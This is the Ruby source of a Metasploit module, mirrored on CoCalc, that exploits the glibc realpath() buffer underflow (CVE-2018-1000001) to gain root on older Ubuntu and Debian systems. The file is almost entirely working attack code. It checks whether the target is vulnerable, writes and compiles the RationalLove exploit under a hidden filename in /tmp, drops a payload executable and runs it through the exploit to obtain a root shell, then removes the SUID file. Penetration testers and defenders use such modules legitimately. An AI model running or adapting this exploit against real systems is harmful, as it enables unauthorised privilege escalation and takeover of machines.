CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/local/glibc_realpath_priv_esc.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = NormalRanking

8


9
  include Msf::Post::File

10
  include Msf::Post::Linux::Priv

11
  include Msf::Post::Linux::System

12
  include Msf::Post::Linux::Kernel

13
  include Msf::Exploit::EXE

14
  include Msf::Exploit::FileDropper

15
  prepend Msf::Exploit::Remote::AutoCheck

16


17
  def initialize(info = {})

18
    super(

19
      update_info(

20
        info,

21
        'Name' => "glibc 'realpath()' Privilege Escalation",

22
        'Description' => %q{

23
          This module attempts to gain root privileges on Linux systems by abusing

24
          a vulnerability in GNU C Library (glibc) version 2.26 and prior.

25


26
          This module uses halfdog's RationalLove exploit to exploit a buffer

27
          underflow in glibc realpath() and create a SUID root shell. The exploit

28
          has offsets for glibc versions 2.23-0ubuntu9 and 2.24-11+deb9u1.

29


30
          The target system must have unprivileged user namespaces enabled.

31


32
          This module has been tested successfully on Ubuntu Linux 16.04.3 (x86_64)

33
          with glibc version 2.23-0ubuntu9; and Debian 9.0 (x86_64) with glibc

34
          version 2.24-11+deb9u1.

35
        },

36
        'License' => MSF_LICENSE,

37
        'Author' => [

38
          'halfdog', # Discovery and RationalLove.c exploit

39
          'bcoles' # Metasploit

40
        ],

41
        'DisclosureDate' => '2018-01-16',

42
        'Platform' => [ 'linux' ],

43
        'Arch' => [ ARCH_X86, ARCH_X64 ],

44
        'SessionTypes' => [ 'shell', 'meterpreter' ],

45
        'Targets' => [[ 'Auto', {} ]],

46
        'Privileged' => true,

47
        'References' => [

48
          [ 'BID', '102525' ],

49
          [ 'CVE', '2018-1000001' ],

50
          [ 'EDB', '43775' ],

51
          [ 'URL', 'https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/' ],

52
          [ 'URL', 'http://www.openwall.com/lists/oss-security/2018/01/11/5' ],

53
          [ 'URL', 'https://securitytracker.com/id/1040162' ],

54
          [ 'URL', 'https://sourceware.org/bugzilla/show_bug.cgi?id=22679' ],

55
          [ 'URL', 'https://usn.ubuntu.com/3534-1/' ],

56
          [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1533836' ]

57
        ],

58
        'DefaultTarget' => 0,

59
        'Notes' => {

60
          'AKA' => ['RationalLove.c']

61
        },

62
        'Compat' => {

63
          'Meterpreter' => {

64
            'Commands' => %w[

65
              stdapi_fs_delete_file

66
            ]

67
          }

68
        }

69
      )

70
    )

71
    register_options [

72
      OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ])

73
    ]

74
    register_advanced_options [

75
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])

76
    ]

77
  end

78


79
  def base_dir

80
    datastore['WritableDir'].to_s

81
  end

82


83
  def upload(path, data)

84
    print_status "Writing '#{path}' (#{data.size} bytes) ..."

85
    write_file path, data

86
    register_file_for_cleanup path

87
  end

88


89
  def upload_and_chmodx(path, data)

90
    upload path, data

91
    cmd_exec "chmod +x '#{path}'"

92
  end

93


94
  def upload_and_compile(path, data)

95
    upload "#{path}.c", data

96


97
    gcc_cmd = "gcc -w -o #{path} #{path}.c"

98
    if session.type.eql? 'shell'

99
      gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}"

100
    end

101
    output = cmd_exec gcc_cmd

102


103
    unless output.blank?

104
      print_error output

105
      fail_with Failure::Unknown, "#{path}.c failed to compile"

106
    end

107


108
    register_file_for_cleanup path

109
    cmd_exec "chmod +x #{path}"

110
  end

111


112
  def strip_comments(c_code)

113
    c_code.gsub(%r{/\*.*?\*/}m, '').gsub(%r{^\s*//.*$}, '')

114
  end

115


116
  def exploit_data(file)

117
    ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2018-1000001', file)

118
  end

119


120
  def live_compile?

121
    return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')

122


123
    if has_gcc?

124
      vprint_good 'gcc is installed'

125
      return true

126
    end

127


128
    unless datastore['COMPILE'].eql? 'Auto'

129
      fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'

130
    end

131
  end

132


133
  def check

134
    version = kernel_release

135
    if Rex::Version.new(version.split('-').first) < Rex::Version.new('2.6.36')

136
      vprint_error "Linux kernel version #{version} is not vulnerable"

137
      return CheckCode::Safe

138
    end

139
    vprint_good "Linux kernel version #{version} is vulnerable"

140


141
    arch = kernel_hardware

142
    unless arch.include? 'x86_64'

143
      vprint_error "System architecture #{arch} is not supported"

144
      return CheckCode::Safe

145
    end

146
    vprint_good "System architecture #{arch} is supported"

147


148
    version = glibc_version

149
    if Rex::Version.new(version.split('-').first) > Rex::Version.new('2.26')

150
      vprint_error "GNU C Library version #{version} is not vulnerable"

151
      return CheckCode::Safe

152
    end

153
    vprint_good "GNU C Library version #{version} is vulnerable"

154


155
    # fuzzy match glibc 2.23-0ubuntu9 and 2.24-11+deb9u1

156
    glibc_banner = cmd_exec('ldd --version')

157
    unless glibc_banner.include?('2.23-0ubuntu') || glibc_banner.include?('2.24-11+deb9')

158
      vprint_error 'No offsets for this version of GNU C Library'

159
      return CheckCode::Safe

160
    end

161


162
    config = kernel_config

163
    if config.nil?

164
      vprint_error 'Could not retrieve kernel config'

165
      return CheckCode::Unknown

166
    end

167


168
    unless config.include? 'CONFIG_USER_NS=y'

169
      vprint_error 'Kernel config does not include CONFIG_USER_NS'

170
      return CheckCode::Safe

171
    end

172
    vprint_good 'Kernel config has CONFIG_USER_NS enabled'

173


174
    unless userns_enabled?

175
      vprint_error 'Unprivileged user namespaces are not permitted'

176
      return CheckCode::Safe

177
    end

178
    vprint_good 'Unprivileged user namespaces are permitted'

179


180
    CheckCode::Appears

181
  end

182


183
  def exploit

184
    if !datastore['ForceExploit'] && is_root?

185
      fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')

186
    end

187


188
    unless writable? base_dir

189
      fail_with Failure::BadConfig, "#{base_dir} is not writable"

190
    end

191


192
    unless writable? base_dir

193
      fail_with Failure::BadConfig, "#{base_dir} is not writable"

194
    end

195


196
    # Upload exploit executable

197
    executable_name = ".#{rand_text_alphanumeric rand(5..10)}"

198
    @executable_path = "#{base_dir}/#{executable_name}"

199
    if live_compile?

200
      vprint_status 'Live compiling exploit on system...'

201
      upload_and_compile @executable_path, strip_comments(exploit_data('RationalLove.c'))

202
    else

203
      vprint_status 'Dropping pre-compiled exploit on system...'

204
      upload_and_chmodx @executable_path, exploit_data('RationalLove')

205
    end

206


207
    # Upload payload executable

208
    payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}"

209
    upload_and_chmodx payload_path, generate_payload_exe

210


211
    # Launch exploit

212
    print_status 'Launching exploit...'

213
    output = cmd_exec "echo '#{payload_path} & exit' | #{@executable_path}", nil, 30

214
    output.each_line { |line| vprint_status line.chomp }

215
  end

216


217
  def on_new_session(client)

218
    # remove root owned SUID executable

219
    if client.type.eql? 'meterpreter'

220
      client.core.use 'stdapi' unless client.ext.aliases.include? 'stdapi'

221
      client.fs.file.rm @executable_path

222
    else

223
      client.shell_command_token "rm #{@executable_path}"

224
    end

225
  end

226
end

227


228